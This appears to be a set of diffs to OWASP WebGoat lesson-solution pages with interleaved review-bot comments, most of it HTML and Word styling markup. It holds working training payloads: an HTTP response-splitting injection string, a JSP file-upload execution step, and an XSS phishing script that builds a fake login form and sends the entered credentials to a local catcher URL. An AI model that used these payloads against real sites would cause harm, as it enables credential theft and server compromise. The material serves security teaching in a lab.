<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Inject: foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Hacked
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Inject: foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202060%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Hacked
</span><span style='font-family:Wingdings;mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;mso-bidi-font-family:Arial;mso-char-type:symbol;
mso-symbol-font-family:Wingdings'><span style='mso-char-type:symbol;mso-symbol-font-family:
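Review bot: The injected `Last-Modified:%20Mon,%2027%20Oct%202060` header on the new line carries a day-name that no longer matches the date once the year is moved from 2003 to 2060 (by my count 27 Oct 2060 is a Wednesday, not a Monday). Most caches ignore the weekday when parsing an RFC 1123 date, but a strict parser would treat the header as malformed and the poisoning step would silently fail, which is exactly the kind of detail a learner will not think to check. I would either change it to `Wed,%2027%20Oct%202060` or, simpler, keep `Mon` and pick a date that is actually a Monday. A one-line remark that the day-name must agree with the date would make the solution more robust for readers who adapt it.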


@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: JSON Injection</title>
<link rel=File-List href="lesson_solutions/JSONInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/JSONInjection_files/editdata.mso">
<!--[if !mso]>


@ -6,7 +6,7 @@
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
<p><b>Lesson Plan Title:</b> Role Based Access Control: Stage 2</p>
<p><b>Concept / Topic To Teach:</b><br/>
In role-based access control scheme, a role represents
@ -38,7 +38,7 @@ There is already a method called isAuthorized which you can use:
</p>
<pre><code>
//***************CODE HERE*************************
if(!isAuthorized(s, userId, requestedActionName))
if(!isAuthorized(s, getUserId(s), requestedActionName))
{
throw new UnauthorizedException();
}


@ -6,7 +6,7 @@
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
<p><b>Lesson Plan Title:</b> Role Based Access Control: Stage 4</p>
<p><b>Concept / Topic To Teach:</b><br/>
In role-based access control scheme, a role represents
@ -39,11 +39,11 @@ Action has already a method called isAuthorizedForEmployee which you can use:
</p>
<pre><code>
//***************CODE HERE*************************
if(!isAuthorized(s, userId, requestedActionName))
if(!isAuthorized(s, getUserId(s), requestedActionName))
{
throw new UnauthorizedException();
}
if(!action.isAuthorizedForEmployee(s, userId, employeeId))
if(!action.isAuthorizedForEmployee(s, getUserId(s), s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID, 0)))
{
throw new UnauthorizedException();
}
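Review bot: The new `isAuthorizedForEmployee` call passes `s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID, 0)`, so a missing or non-numeric employee_id is silently replaced by 0 and the authorization check runs against an employee that presumably does not exist; whether the helper denies in that case is not visible here, and a check that depends on a default is weaker than one that rejects bad input outright. I would read the parameter once, fail closed when it is absent, and pass that same value to the check: `int employeeId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID, -1);` followed by `if (employeeId < 0 || !action.isAuthorizedForEmployee(s, getUserId(s), employeeId)) { throw new UnauthorizedException(); }`. Reading the parameter in one place also avoids the check and the later use of the id drifting apart if the parsing defaults ever change. The surrounding handler method is outside this hunk, so the exact exception handling it expects should be confirmed against the class.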


@ -6,7 +6,7 @@
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
<p><b>Lesson Plan Title:</b> Role Based Access Control: Stage 1</p>
<p><b>Concept / Topic To Teach:</b><br/>
In role-based access control scheme, a role represents


@ -6,7 +6,7 @@
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
<p><b>Lesson Plan Title:</b> Role Based Access Control: Stage 3</p>
<p><b>Concept / Topic To Teach:</b><br/>
In role-based access control scheme, a role represents


@ -19,7 +19,7 @@ For this exercise, you will perform stored and reflected XSS attacks. You will a
<p><b>Solution:</b><br/>
You have to use a static method called encode(String s) which is part of the class org.owasp.webgoat.util.HtmlEncoder.
<p>This method changes all special characters in the string. Now you have to use this method in the getEmployeeProfile method in the org.owasp.webgoat.lessons.CrossSiteScripting class.
<p>This method changes all special characters in the string. Now you have to use this method in the getEmployeeProfile method in the org.owasp.webgoat.lessons.CrossSiteScripting.ViewProfile class.
Replace all answer_results.getString(someString) with HtmlEncoder.encode(answer_results.getString(someString)) and you are done.</p>
</body>


@ -0,0 +1,46 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution: Malicious File Execution</title>
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Malicious File Execution</p>
<p><b>Concept / Topic To Teach:</b><br/>
Many sites allow the user to upload files, such as images or videos. Without the proper security, files containing malicious commands can be and then executed on the server.
</p>
<p><b>General Goal(s):</b><br/>
The form below allows you to upload an image which will be displayed on this page. Features like this are often found on web based discussion boards and social networking sites. This feature is vulnerable to Malicious File Execution.<br/><br/>
In order to pass this lession, upload and run a malicious file. In order to prove that your file can execute, it should create another file named guest.txt<br/><br/>
Once you have created this file, you will pass the lesson.
</p>
<b>Solution:</b><br/><br/>
The first step of malicious file execution is to create a file that we can run on the server. In this lesson, our goal is to create the file <b>guest.txt</b> in the directory provided in the lesson (the path is generated based on your system).<br/><br/>
To do this, we write a .jsp file that uses the java createNewFile() command. The file contents will look like this:<br/>
&lt;HTML&gt;
&lt;%
java.io.File file = new java.io.File(&quot;<b>filepath</b>\\guest.txt&quot;);
file.createNewFile();
%&gt;
&lt;/HTML&gt;<br/><br/>
The <b>&lt;%</b> indicates that the upcoming code is a java servlet, so java code is allowed. Make sure you fill in the filepath correctly - each directory must be separated by <b>\\</b>, not <b>\</b>. The filename of the .jsp doesn't matter, as long as you know what it is.<br/><br/>
Next, we need to figure out where the files are being uploaded so we can execute them. In this case, since we are shown the image, this is very easy. Upload an image using the form, then right click on it and check its properties.<br/>
<img src="lesson_solutions/MaliciousFileExecution_files/image001.jpg"><br/>
<font size="2"><b>Viewing properties of the uploaded image in Firefox.</b></font><br/><br/><br/><br/>
<img src="lesson_solutions/MaliciousFileExecution_files/image002.jpg"><br/>
<font size="2"><b>File path for the uploaded image (and our .jsp) in Firefox.</b></font><br/><br/>
The URL should look something like <b>http://localhost/webgoat/uploads/image.jpg</b>.<br/>
The last step is to upload our malicious .jsp and browse to it so it will execute. Upload the file, then type its address into your browser. The address should be something like <b>http://localhost/webgoat/uploads/yourfile.jsp</b>.<br/><br/>
A blank page will load. You can then return to the lesson and refresh, completing the lesson.<br/><br/><br/>
</body>
</html>
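Review bot: The explanation under the JSP snippet is inaccurate in two places that will trip up a learner: `<% ... %>` is a JSP scriptlet (the container compiles the page into a servlet), not "a java servlet", and the `\\` advice is Windows-specific — inside a Java string literal `\\` is just the escaped form of one backslash, while a forward slash works for `java.io.File` on Windows and Unix alike, so `new java.io.File("filepath/guest.txt")` is both simpler and portable. I would also warn that `createNewFile()` throws when the parent directory does not exist, so a mistyped path yields a server error page rather than the promised blank page, which is the usual reason this lesson "doesn't pass". Finally the page shows only the attack; one closing sentence naming the defence (keep uploads outside the web root or in a location the container will not execute, allow-list extensions and content types, and rename files on upload) would turn it into the lesson plan it is titled as. Minor typos: "can be and then executed" should read "can be uploaded and then executed", and "lession" should be "lesson".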


@ -0,0 +1,14 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution: Modify Data with SQL</title>
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Off By One Buffer Overflows</p>
<p>This new lesson does not yet have a detailed solution. If you would like to provide a solution for this lesson, please send an e-mail to <a href="mailto:WebGoat@owasp.org">WebGoat@owasp.org</a>.</p>
</body>
</html>


@ -1,7 +1,7 @@
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Block Stored XSS</title>
<title>Phising with XSS</title>
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
@ -30,38 +30,40 @@ This solution consists of two parts you have to combine:
</ul>
A Form with username and password could look like this:<br/>
<p>
&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot;
name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot;
&lt;/form&gt;&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot;
name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;
<br/><br/>Search for this term and you will see that a form is added to the page.
<br/><br/>Search for this term and you will see that a form is added to the page since the search field accepts HTML.
<br/>The initial &lt;/form&gt; tag is to terminate the original search form.
</p>
Now you need a script:
<p>
&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
User Name = &quot; + document.forms[0].user.value + &quot;Password = &quot; + document.forms[0].pass.value);
XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+
document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}
&lt;script&gt;function hack(){ XSSImage=new Image; XSSImage.src=&quot;<font color="blue">http://localhost/webgoat/</font>catcher?PROPERTY=yes&amp;user=&quot;+
document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;; alert(&quot;Had this been a real attack... Your credentials were just stolen.
User Name = &quot; + document.phish.user.value + &quot;Password = &quot; + document.phish.pass.value);}
&lt;/script&gt;
</p>
<p>
This script will read the input from the form and send it to the catcher of WebGoat.<br/><br/>
This script will read the input from the form and send it to the catcher of WebGoat.<br/>
The text <font color="blue">in blue</font> should match what is in your address bar. If you are using ports and/or webscarab, it may be different.<br/>
The last step is to put things together. Add a Button to the form which
calls the script. You can reach this with the onclick="myFunction" handler.
calls the script. You can reach this with the onclick="myFunction()" handler:
</p>
<p>
&lt;input type=&quot;submit&quot; name=&quot;login&quot; value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;
<p>
The final String looks like this:<br/>
&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen.
User Name = &quot; + document.forms[0].user.value + &quot;Password = &quot; + document.forms[0].pass.value);
XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+
document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}
&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot;
name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot;
name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot;
value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;
&lt;/form&gt;&lt;script&gt;function hack(){ XSSImage=new Image; XSSImage.src=&quot;<font color="blue">http://localhost/webgoat/</font>catcher?PROPERTY=yes&amp;user=&quot;+
document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;; alert(&quot;Had this been a real attack... Your credentials were just stolen.
User Name = &quot; + document.phish.user.value + &quot;Password = &quot; + document.phish.pass.value);}
&lt;/script&gt;&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot;
name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;
</p>
Search for this String and you will see a form asking for your username and password.
Fill in these fields and click on the Login Button.
Fill in these fields and click on the Login Button, which completes the lesson.<br/><br/>
<img src="lesson_solutions/Phishing_files/image001.jpg"><br/>
<font size="2"><b>New login field after submitting the script.</b></font><br/><br/><br/>
</body>
</html>


@ -0,0 +1,641 @@
<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns="http://www.w3.org/TR/REC-html40">
<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: Same Origin Policy Protection</title>
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author>egeirnaert</o:Author>
<o:LastAuthor>egeirnaert</o:LastAuthor>
<o:Revision>3</o:Revision>
<o:TotalTime>54</o:TotalTime>
<o:Created>2007-07-11T15:30:00Z</o:Created>
<o:LastSaved>2007-07-12T15:20:00Z</o:LastSaved>
<o:Pages>2</o:Pages>
<o:Words>607</o:Words>
<o:Characters>3461</o:Characters>
<o:Company> </o:Company>
<o:Lines>28</o:Lines>
<o:Paragraphs>8</o:Paragraphs>
<o:CharactersWithSpaces>4060</o:CharactersWithSpaces>
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:DontVertAlignCellWithSp/>
<w:DontBreakConstrainedForcedTables/>
<w:DontVertAlignInTxbx/>
<w:Word11KerningPairs/>
<w:CachedColBalance/>
</w:Compatibility>
<w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
